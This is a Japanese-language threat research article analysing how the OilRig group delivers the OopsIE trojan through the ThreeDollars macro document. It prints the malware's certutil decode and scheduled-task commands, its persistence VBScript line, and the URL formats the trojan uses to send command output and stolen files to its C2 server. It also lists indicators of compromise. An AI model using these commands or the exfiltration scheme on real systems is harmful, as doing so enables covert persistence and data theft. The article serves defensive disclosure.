[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [ラーニング ハブ](https://unit42.paloaltonetworks.com/ja/category/learning-hub-ja/ "ラーニング ハブ")
* [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/ "マルウェア")  
  [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

# OilRigがThreeDollarsを使用して新たなトロイの木馬OopsIEを配信

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 2 分で読めます

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Bryan Lee](https://unit42.paloaltonetworks.com/ja/author/bryanlee/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2018年2月23日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)
  * [ラーニング ハブ](https://unit42.paloaltonetworks.com/ja/category/learning-hub-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [Don't Panic](https://unit42.paloaltonetworks.com/ja/tag/dont-panic-ja/)
  * [Podcast](https://unit42.paloaltonetworks.com/ja/tag/podcast-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/?pdf=download&lg=ja&_wpnonce=40dbae5d0f "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/?pdf=print&lg=ja&_wpnonce=40dbae5d0f "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=OilRigがThreeDollarsを使用して新たなトロイの木馬OopsIEを配信&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan%2F&title=OilRigがThreeDollarsを使用して新たなトロイの木馬OopsIEを配信 "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan%2F&text=OilRigがThreeDollarsを使用して新たなトロイの木馬OopsIEを配信 "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=OilRigがThreeDollarsを使用して新たなトロイの木馬OopsIEを配信%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan%2F "Share in Mastodon")

## 概要

[OilRig](https://blog.paloaltonetworks.com/tag/oilrig/)による組織的な攻撃活動は依然として盛んであり、彼らが使用するツールも進化し続けています。2018年1月8日にUnit 42では、こうした脅威をもたらす活動を組織的に行っているOilRigが、中東を拠点とする保険代理店に攻撃を仕掛けたことを確認しました。そのちょうど1週間後の2018年1月16日には、中東の金融機関が攻撃されました。いずれの攻撃でも、OilRigは、Unit 42が現在も追跡している新たなトロイの木馬であるOopsIEの配信を試みていました。

1月8日の攻撃では、[ThreeDollarsというドキュメント](https://blog.paloaltonetworks.com/tag/threedollars/)の亜種が使用され、配信されました。これは、[2017年8月](https://blog.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/)に発生した攻撃でOilRigが使用したツールの一部であることがわかりました。

しかし、1月16日の攻撃では、ThreeDollarsはまったく使用されませんでした。トロイの木馬OopsIEが被害者に直接配信されたのです。スピア フィッシング メールに埋め込まれたリンクが使用されたのは、ほぼ間違いないでしょう。興味深いことに、1月16日の攻撃の標的となった組織は、1年前の2017年1月にもOilRigの標的にされていました。このように攻撃が繰り返されるということは、攻撃者が標的組織での足場を失ってしまったか、その組織が標的として大きな価値を秘めていることを示唆しています。

## 新たな攻撃

2018年1月8日に、OilRigは「Beirut Insurance Seminar Invitation」(ベイルートで開催される保険セミナーのご案内)という件名の電子メールを中東の保険代理店に送りました。OilRigは、6分間のうちに同じ組織の2つの異なる電子メール アドレスに2通の電子メールを送りました。受信者の電子メール アドレスは、標的となった組織の特定の地方支店で使用されているものを装っています。

どちらの電子メールも同じアドレスから送られていました。その電子メール アドレスは、有名なグローバル金融機関のレバノンのドメインに関連付けられています。しかし、収集されたセッション データによると、送信者の電子メール アドレスはされていた可能性が非常に高いのです。そうした電子メールにはSeminar-Invitation.docという名前のファイルが添付されています。このファイルこそ、私たちが追跡している悪意のあるMicrosoft Wordドキュメント、すなわちThreeDollarsです。このThreeDollarsのサンプルを調べてみると、私たちがOopsIEと名付けた新たなペイロードが埋め込まれていることがわかります。

2018年1月16日の攻撃では、OilRigが2017年1月にも標的にしたことのある組織を攻撃したことが確認されました。今度は、ThreeDollarsというドキュメントは使用されず、配信されませんでした。そして、電子メールのリンクを介した場合と同様に、トロイの木馬OopsIEが標的の組織に直接配信されたのです。このトロイの木馬は、OopsIEのコマンド\&コントロール(C\&C)サーバから直接ダウンロードされるようになっており、このサーバがステージングにも使用されたことがわかります。つまり、この組織が2017年1月の攻撃の標的にされた後でOilRigの既知の手法(この場合は、悪意のあるマクロを埋め込んだドキュメントの配信)への対策を済ませていたために、OilRigの攻撃者が別の方法で配信しようとした可能性があります。

また、2017年1月15日にstrategy preparation.dotというファイル名で作成された、ThreeDollarsの別のサンプルも確認されました。このサンプルはSeminar-Invitation.docというサンプルによく似ていますが、いくつかの大きな違いがあります。主な違いは、このサンプルが暗号化され、パスワードで保護されていて、被害者がパスワードの入力を要求されることです。そうしたパスワードは、おそらく攻撃者がドキュメントを表示するために設定したものでしょう。これは目新しい方法ではありませんが、OilRigのプレイブックで使用されているのが確認されたのはこれが初めてです。通常、パスワードで保護されたドキュメントは、攻撃者がパスワードの要件を満たしたうえで、自動化された分析メカニズムを回避して逃れるための手段として使用されます。OilRigの追跡を通じて、実証された方法を用いることが長い間一般的だったことが確認されました。

## ThreeDollars文書の分析

これらの攻撃で弊社が収集したThreeDollarsのサンプルは、[2017年10月に分析した](https://blog.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan)最初のサンプルと酷似しています。例えば受信者をだまして「Enable Content(コンテンツを有効化)」ボタンをクリックさせ、悪意のあるマクロを実行するために疑似餌(ルアー)として使用された画像にも同じものが利用されています。2018年1月の攻撃で使用されたこの画像は、各サンプルでまったく同じであったことがファイル ハッシュによって確認されています。

図1に、最新の攻撃から抽出したルアー画像と、弊社が分析した最初のサンプルで使用されたルアー画像を示します。同じ攻撃者グループによる攻撃で一定期間同じリソースが使用されることは不思議ではありませんが、これらの画像がいかに似ているか細かく分析しました。

![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/02/word-image-60.jpeg)

![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/02/word-image-61.jpeg)

*図1 2017年10月と2018年1月の攻撃でThreeDollarsで使用されたおとり画像を比較*

一見して、これらの画像がきわめて似ていることがわかりますが、いくつかの明確な違いがあります。たとえば2017年8月の攻撃で使用された画像は明らかに大きく、3508 x 4961ピクセルの画像解像度を使用しており、300 dpiのA3用紙1枚と同じ解像度です。また、Microsoftのロゴや「against unauthorized use」というテキストなどのアーティファクト(痕跡、遺物)がイメージに追加されています。比較すると、最新のルアー画像は、文書の制約でサイズを合わせるために水平方向に変形されているようです。また「This document is protected」の後のピリオドの位置もずれています。

これら2つの画像を重ねて比較し、最新画像の変形具合を勘案すると、最新のものは2017年8月の画像をトリミングした編集版の可能性が高いということができます。

![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/02/word-image.gif)

両画像で使用されたカラー コード(#da3b01)を調べても、これらがまったく同じであることを示しています。最新画像の大きさは、古い10月のものの約40％なので、作成者は新しい画像をトリミング後、さらにサイズ調整したと考えられます。元画像に見られる特異なアーティファクトとして「against」という単語における「st」 (Unicode \\uFB06)の [合字](https://en.wikipedia.org/wiki/Typographic_ligature)の使用があげられます。これは一般にはほとんど見られないグリフで、標準的なキーボードレイアウトではまず使用できません。このことから、この文字列は、キーボードから直接入力されたのではなく、機械によって生成されたと考えられます。また、このようなグリフを使用していることから、作成者が英語を母国語として話す人物ではないと推測されます。

## 悪意のあるマクロの分析

被害者がThreeDollars文書を開くと、ルアー画像が提示され、「Enable Content(コンテンツを有効化)」ボタンをクリックするように促されます。ボタンをクリックすると、悪意のあるマクロが密かに実行され、システムにペイロードがインストールされ、実行されます。また、悪意のある活動に対する不信感を軽減するために、被害者に対し、さらにおとりの画像が表示されます。被害者に最終的に提示されるおとりメッセージは、配信された電子メールで提示される、保険セミナーの招待として予測されるような内容ではありません。実際には、Word文書内に図2に示すような「NullRefrencedException! error has occurred in user32.dll by 0x32ef2121」という偽のエラー メッセージが表示されます。

![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/02/word-image-62.jpeg)

*図2 ThreeDollars配信文書の悪意のあるマクロによって表示されるおとりメッセージ*

図2のおとりメッセージを表示する一方で、マクロは###$$$という区切り文字を探して文書を検索し、この区切り文字の後のbase64エンコード化テキストを%APPDATA%\\Base.txtというファイルに書き込みます。次にマクロは、1分間待機してから実行されるSecurityAssistというスケジュール タスクを作成します。SecurityAssistタスクは、以下のコマンド ライン コマンドを実行します。このコマンドは、Certutilアプリケーションを使用して、Base.txt内のbase64エンコード化データをデコードして、デコードされたデータを%PROGRAMDATA%\\IntelSecurityAssistManager.exeというファイルに保存します。

cmd.exe /c Certutil -decode %appdata%\\Base.txt %programdata%\\IntelSecurityAssistManager.exe \& SchTasks /Delete /F /TN SecurityAssist

また、マクロは、2番目のスケジュールされたタスクConhostを作成します。このタスクは、2分待機した後にVBScript %APPDATA%\\chkSrv.vbsを実行します。マクロはchkSrv.vbsスクリプトをシステムに保存します。これはIntelSecurityAssistManager.exeペイロード(OopsIEトロイの木馬)を実行し、2つのスケジュールされたタスク、Base.txtファイル、ThreeDollars文書、およびchkSrv.vbsスクリプトを削除してインストールをクリーンアップする責任を担っています。

## OopsIEトロイの木馬の分析

これらの攻撃で配信されるOopsIEトロイの木馬は、SmartAssemblyによって圧縮され、さらにConfuserEx v1.0.0によって難読化されています。システム上で持続的に実行するために、トロイの木馬は最初にVBScriptファイルを作成します。

SpecialFolder.CommonApplicationData\\srvResesponded.vbs

以下が含まれます。

CreateObject("WScript.Shell").Run("%app%")

トロイの木馬は、上記VBScript内の%app%文字列を実行可能ファイルへのパスで置き換えます。最後に、トロイの木馬はスケジュールされたタスクを作成し、%path%文字列をsrvResesponded.vbs VBScriptへのパスで置き換えた後に、コマンドプロンプトで次のコマンドを実行して、3分ごとに自身を実行します。

SchTasks /Create /SC MINUTE /MO 3 /TN "InetlSecurityAssistManager" /TR "wscript %path%" /f

トロイの木馬は、HTTP、特にInterop.SHDocVwと呼ばれる埋め込まれたMicrosoft .NET Frameworkアセンブリ内のInternetExplorerアプリケーション オブジェクトを使用してC2サーバと通信します。トロイの木馬は、S1とS2という2つのリソースのコンテンツを連結することでこの埋め込まれたアセンブリを抽出して読み込み、結果のデータをGZipStreamクラスを使用して解凍します。最終的なInterop.SHDocVw .NETアセンブリはSmartAssemblyによって圧縮され、さらにConfuser v1.9.0.0を使用して難読化されます。リソースを連結して埋め込まれたアセンブリを作成する方法は、OilRigグループの新しい手法ではなく、2017年10月にも埋め込まれたライブラリJoiner.dllとInner.dllを作成するために彼らの[ISMInjector](https://blog.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/)ツール内で使用されています。

InternetExplorerアプリケーション オブジェクトを使用することで、すべてのC2関連の要求が、正規のブラウザから送信され、カスタムUser-Agentsなどの特異なフィールドは要求に含まれていないように見えます。OopsIEトロイの木馬は、次でホストされているC2サーバを使用するように設定されています。

www.msoffice365cdn\[.\]com

トロイの木馬は、C2サーバと通信するための特定のURLを作成し、C2サーバの応答を解析して、タグ\<pre\>と\</pre\>の間のコンテンツを検出します。以下のイメージに示すように、初期HTTPリクエストはビーコンとして動作します。

![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/02/word-image-63.jpeg)

上記の要求でわかるとおり、トロイの木馬は以下の構造をもつビーコンのURLを生成します。

http://\<c2 domain\>/chk?\<hex(Environment.UserName/Environment.MachineName)\>

トロイの木馬はこのURLにリクエストを発行してチェックし(そのため、URL内にchk文字列がある)、C2サーバがトロイの木馬を実行させるためのコマンドを保持しているかどうかを判別します。C2サーバは、追加のコマンドを提供したい場合、値\<hex(Environment.UserName/Environment.MachineName)\>をエコーすることで、トロイの木馬のリクエストに応答します。C2サーバが適切なエコー データで応答しない場合、トロイの木馬はSpecialFolder.CommonApplicationDataフォルダにsrvCheckresponded.tmpという名前のファイルを作成し、それに何も書き込まずに終了します。

C2サーバが適切なエコー データで応答した場合、トロイの木馬は次のURLにリクエストを発行して、C2がどのコマンドを実行しようとしているか判別を試みます。

http://\<c2 domain\>/what?\<hex(Environment.UserName/Environment.MachineName)\>

whatコマンドの発行後、トロイの木馬は、C2の応答を解析し、文字列「Oops」の有無を検索します。「Oops」が検出された場合、トロイの木馬はC2になんらかの問題があったたものとして処理を終了します。トロイの木馬が処理を終了しなかった場合、サーバはコマンドに続け、区切り文字\<\>で分離された一連のパラメータで応答します。

\[command\]\<\>\[parameters for command in hexadecimal format\]

使用可能なコマンド:

|----------|--------------------|
| **コマンド** | **説明**             |
| 1        | コマンドを実行する          |
| 2        | ファイルをアップロードする      |
| 3        | 指定されたファイルをダウンロードする |

各コマンドのパラメータは16進形式で発行されます。たとえば、文字Aは、この文字の16進表記である2文字41で表されます。この16進形式は、このトロイの木馬全体を通じて広く使用されています。

実行コマンド(1)は付加されたコマンド パラメータを使用してプロセスcmd.exe /cを作成し、コマンドの出力を16進形式でファイル%APPDATA%\\tmpCa.vbsに書き込みます。その後、トロイの木馬はこのファイルの16進形式のコンテンツを1500バイトのブロック単位で読み取り、それぞれの1500バイトのデータを、次の構造をもつURLへのHTTP GETリクエストを介して、ファイルからC2サーバへ送信します。

http://\<c2 domain\>/resp?\<hex(Environment.UserName/Environment.MachineName)\>AAZ\<hex(command prompt output)\>

アップロードコマンド(2)は、C2によって提供されたデータを指定されたファイルに書き込みます。このコマンドに指定されるパラメータには、バイナリデータとファイル名の16進値が含まれ、それぞれ区切り文字(!)で分離されています。トロイの木馬は、以下のように構造化されたURLを送信してC2に応答し、正常にアップロードされたことを通知します。

http://\<c2 domain\>/resp?\<hex(Environment.UserName/Environment.MachineName)\>AAZ\<hex("File Uploaded")\>

ダウンロードコマンド(3)は、指定されたファイルのコンテンツを読み取り、データをC2サーバへ送信します。ファイルが存在しない場合、トロイの木馬は以下のURLを送信して、C2サーバにメッセージ\< File Not Found \>を送信します。

http://\<c2 domain\>/resp?\<hex(Environment.UserName/Environment.MachineName)\>AAZ\<hex("\< File Not Found \>")\>

ファイルが存在する場合は、トロイの木馬は指定されたファイルのコンテンツを読み取り、GZipStreamクラスを使用してコンテンツを圧縮します。その後、トロイの木馬は圧縮されたデータの16進値を取得し、各行の以下の16進値をASCII文字で置き換え、さらにデータを圧縮します。

|--------------|-----------|
| **16進値の文字列** | **文字の置換** |
| 000000       | z         |
| 00000        | x         |
| 0000         | y         |
| 000          | g         |
| 00           | w         |
| 01           | t         |

その後、トロイの木馬は、1500バイトの16進形式のデータを1行に1ブロックずつ、SpecialFolder.CommonApplicationDataフォルダ内の一時ファイルに書き込みます。

\<day\>\<hour\>\<second\>\<millisecond\>.tmp

トロイの木馬は、この一時ファイルから各行を読み取り、以下のように構造化されたURLへ要求を発行することで、それらをC2サーバへ送信します。

http://\<c2 domain\>/resp?\<hex(Environment.UserName/Environment.MachineName)\>ABZ\<hex(1500 characters of hexadecimal formatted file contents)\>

一時ファイル内の16進形式のデータ行がすべてC2サーバへ送信されると、トロイの木馬はC2サーバに要求を送信して、以下のように構造化されたURLを介して、データが正常に送信されたことを通知します。

http://\<c2 domain\>/resp?\<hex(Environment.UserName/Environment.MachineName)\>ABZFinish

## 以前のOilRigグループ攻撃との重複

2016年5月以降、私たちは継続してOilRigグループに関連付けられたさまざまな攻撃とツールを監視し、明らかにしてきました。このグループによって使用された新しいツールを発見すると、常に、以前に使用されたツールやインフラストラクチャと重複するアーティファクトが使用されていることがわかります。単一の攻撃者を想定している場合はこのような共通する特徴は驚くに値しません。効率性のためか、怠慢のせいかに関わらず、攻撃者がいかに頻繁に特定の戦略や手法を繰り返し使用しているかを示している良い例です。

上記で説明した攻撃では、それまでに知られていなかったC2(コマンド\&コントロール)ドメインを使用して新しいペイロードが配信された様子を観測しました。ただし、継続して証拠の痕跡を辿っていくと、OilRigグループからの過去の攻撃や共通のアーティファクトへの直接的なリンクが見つかりました。もっとも明白なリンクは、以前に異なる文書の配信を観察したことがある、ThreeDollars配信文書の再利用です。しかし、C2ドメインmsoffice365cdn\[.\]comによって開始される他のOilRigグループ攻撃へのその他の接続も検出されています。

WHOISレコードで始まる、emilia.jones@mail.ruによって登録されたドメインも観察されています。この電子メール アドレスに登録されているその他のドメインを調べると、以前に[2017年10月にOilRig C2に関連して](https://blog.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/)特定したドメインoffice365-management\[.\]comが明らかになりました。引き続きWHOISレコードを調べ、かなり固有の電話番号もそのレコードで使用されていることがわかりました。それは、leonard.horner@mail.ruに登録されたドメインoffice365-technical\[.\]infoのもう1つのWHOISレコードでのみ見つかりました。関係リンクとドメイン名のテーマの共通性に基づき、このドメインと登録者もOilRigグループに起因していると強く確信する理由を得ました。

特定されたドメインを解決してIPアドレスを調べると、ここでも有益な結果が得られました。Msoffice365cdn\[.\]comを解決すると80.82.79.221になり、これはoffice365-technical\[.\]infoを解決した80.82.79.240と同一のクラスCネットワーク範囲に含まれます。さらに、80.82.79.221は他のIPアドレスのいくつかとSSL証明書を共有していて、そのうちの1つは185.162.235.29だということもわかりました。このIPを解決するとoffice365-management\[.\]comになります。これはemilia.jones@mail.ru名義で登録されたドメインのうちの1つです。185.162.235.0/24のクラスCネットワークを調べたところ、このネットワークに属するIPの1つがOilRigにまつわるドメインに解決されることがわかりました。そのドメイン名は、私たちが2017年8月に特定したmsoffice-cdn\[.\]comです。

最後に、配信された文書そのものを分析します。この文書はThreeDollarsツールの亜種と判明し、おとりとして文書内に使われた画像は、以前使われたものと比較して分析されました。しかし、このサンプルおよび攻撃と、OilRigのものと考えられる、以前のツールおよび攻撃とのつながりを強めるアーティファクトが、さらに存在します。今回のケースでは、収集されたThreeDollarsサンプルの1つが、J-Win-7-32-Vmという独自の作成者名を含んでいました。この作成者名は、以前にも1度使われたことが確認されています。それは私たちが一番初めに収集したThreeDollars文書においてであり、これについては2017年8月に報告しました。

![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/02/word-image-245.png)

## 結論

OilRigグループは、中東地域におけるきわめて活発な攻撃者であり続けています。このグループは、戦略を積極的に適応および進化させようとする徴候をたびたび示していますが、いくつかの特徴を再利用してもいます。私たちはこれまで、OilRigによって配置された多数のツールを確認してきました。これらのツール1つ1つは、過去に使われたものを再利用した、亜種のようなものと思われます。しかし、ツールそのものは時間とともに変化したものの、攻撃のライフサイクルを通して調べると、OilRigのプレイブックで実行されるプレイは大部分が変わらないままです。このプレイはOilRigのプレイブックに追加されました。このプレイブックは弊社の[プレイブック ビューアー](https://pan-unit42.github.io/playbook_viewer/)から、オンラインでご覧いただけます。

Palo Alto Networksのお客様は、以下の製品によってこの脅威から保護されています。

1. WildFireはThreeDollarsおよびOopsIEについて、悪意があると判断したペイロードすべてを検出します。
2. AutoFocusをご使用のお客様は、[ThreeDollars](https://autofocus.paloaltonetworks.com/#/tag/Unit42.ThreeDollars)および[OopsIE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.OopsIE)タグで、これらのツールについて調べることができます。
3. Trapsは、ThreeDollarsによる配信文書やOopsIEのペイロードをブロックします。
4. PanAVはThreeDollarsのサンプルをVirus/Win32.WGeneric.pefia、OopsIEのペイロードをVirus/Win32.WGeneric.pipwfとして検出します。

## IOC

### ThreeDollars の SHA256 値

* ec3f55cac3e8257d6d48e5d543db758fed7d267f14f63a6a5d98ba7a0fab6870
* 81eb43ad46ed39bd4b869c709e5e468a6fc714485da288aaa77c80291ce6db8c

### OopsIE の SHA256 値

* 9a040cdd7c9fcde337b2c3daa2a7208e225735747dd1366e6c0fcbc56815a07f
* 231115a614c99e8ddade4cf4c88472bd3801c5c289595fc068e51b77c2c8563f

### OopsIE の C2 サーバー

* www.msoffice365cdn\[.\]com

### 関連するインフラストラクチャ

* office365-management\[.\]com
* office365-technical\[.\]info
* msoffice-cdn\[.\]com
* 80\.82.79.221
  トップに戻る

### タグ

* [Don't Panic](https://unit42.paloaltonetworks.com/ja/tag/dont-panic-ja/ "Don't Panic")
* [Podcast](https://unit42.paloaltonetworks.com/ja/tag/podcast-ja/ "podcast")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:TrapsによるAdobe Flash Playerゼロデイ攻撃に対する防御](https://unit42.paloaltonetworks.com/ja/unit42-traps-prevents-adobe-flash-player-zero-day/ "TrapsによるAdobe Flash Playerゼロデイ攻撃に対する防御")

### 目次

* 

### 関連記事

## 関連項目 マルウェア リソース

![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年8月6日 [#### ChainDropの脅威の概要:自己増殖型npmワームの内部](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/ja/tag/blockchain-ja/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/ja/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/ja/tag/claude-code/ "Claude code")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/ "ChainDropの脅威の概要:自己増殖型npmワームの内部")  
  ![Pictorial representation of the npm packages supply chain attack. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/05_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年6月2日 [#### npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Npm packages](https://unit42.paloaltonetworks.com/ja/tag/npm-packages/ "npm packages")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/ "npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)")  
  ![Pictorial representation of Screening Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/Serpens-Iran-A-1920x900-2-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年5月22日 [#### イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/ja/tag/advanced-persistent-threat-ja/ "Advanced Persistent Threat")

* [AppDomainManager](https://unit42.paloaltonetworks.com/ja/tag/appdomainmanager/ "AppDomainManager")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/ "イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡")  
  ![Pictorial representation of Iran cyber attacks. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月17日 [#### 脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/)

* [APK](https://unit42.paloaltonetworks.com/ja/tag/apk-ja/ "APK")

* [DDoS attacks](https://unit42.paloaltonetworks.com/ja/tag/ddos-attacks-ja/ "DDoS attacks")

* [GenAI](https://unit42.paloaltonetworks.com/ja/tag/genai-ja/ "GenAI")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/ "脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)")  
  ![Pictorial representation of the supply chain attack compromising Axios. A giant eye made of glowing binary code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/02_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月1日 [#### 脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/)

* [API attacks](https://unit42.paloaltonetworks.com/ja/tag/api-attacks-ja/ "API attacks")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/ "脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響")  
